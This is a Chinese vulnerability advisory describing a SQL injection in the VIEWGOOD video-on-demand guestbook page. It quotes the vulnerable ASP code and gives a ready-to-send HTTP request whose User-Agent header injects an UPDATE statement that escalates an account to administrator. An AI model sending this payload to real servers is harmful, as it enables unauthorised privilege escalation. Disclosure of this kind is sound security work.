远古视频点播系统Guest.asp页面存在注入漏洞


添加时间:
2009-03-04

系统编号:
WAVDB-01350

影响版本:
/

程序介绍:

VIEWGOOD视频点播系统模块是流媒体服务平台解决方案的重要模块之一,可以独立运营。整个模块基于B/S架构,采用VIEWGOOD自主知识产权的VConnect服务内核,除支持MPEG-1(mpg、dat、mp3)、MPEG-4(avi、asf、wmv)、REAL(rm、rmvb)、REAL10等众多主流媒体格式外,还支持所有非媒体流格式,同时采用NoDelay独创技术,支持广域网任意拖拽,响应时间极短。采用标准HTTP协议,全面实现对多网卡、跨网段、跨路由、跨防火墙的支持。单服务器支持1000并发流(无缓冲)。

漏洞分析:

漏洞产生于文件/webmedia/oemui/user/guest.asp

 
  1. szAgent = Request.ServerVariables("HTTP_USER_AGENT")  
  2. aTmpInfo = Split(szAgent, " (", -1, 1)  
  3. aAgentInfo = Split(aTmpInfo(1), "; ", -1, 1)  
  4.    
  5. szBrowser = aAgentInfo(1)  
  6. if Right(aAgentInfo(2), 1) = ")" or Right(aAgentInfo(2), 1) = ";" then  
  7.     szOS = Left(aAgentInfo(2), Len(aAgentInfo(2)) - 1)  
  8. else  
  9.     szOS = aAgentInfo(2)  
  10. end if  
  11. szClientIP = Request.ServerVariables("REMOTE_ADDR")  
  12.    
  13. szSQL = "INSERT INTO GuestBook(CusTomer_ID,cont,ipaddr,ostype,browser,crdt) VALUES(" & iUserID & ",'" & szMemo & "','" & szClientIP & "','" & szOS & "','" & szBrowser & "','" & now "')"  
  14. con.Execute szSQL  



漏洞利用:

HTTP_USER_AGENT我们可以自己构造

 
POST /webmedia/oemui/user/guest.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, 
Referer: http://you.are.fucked.cn/webmedia/oemui/user/guest.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0','');update Customer_Group set Group_ID=1 where Customer_ID=9--; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: you.are.fucked.cn
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACDTQQ=CGGFJOGANCPNAIAIABABHMHA;
 
 
memo=aaaa&submit=%B7%A2%CB%CD%D3%C3%BB%A7%C1%F4%D1%D4%D0%C5%CF%A2+%3E%3E%3E



信息来源:
<*来源: Web安全手册
http://www.pcsec.org/archives/VIEWGOOD-VOD-0DAY.html *>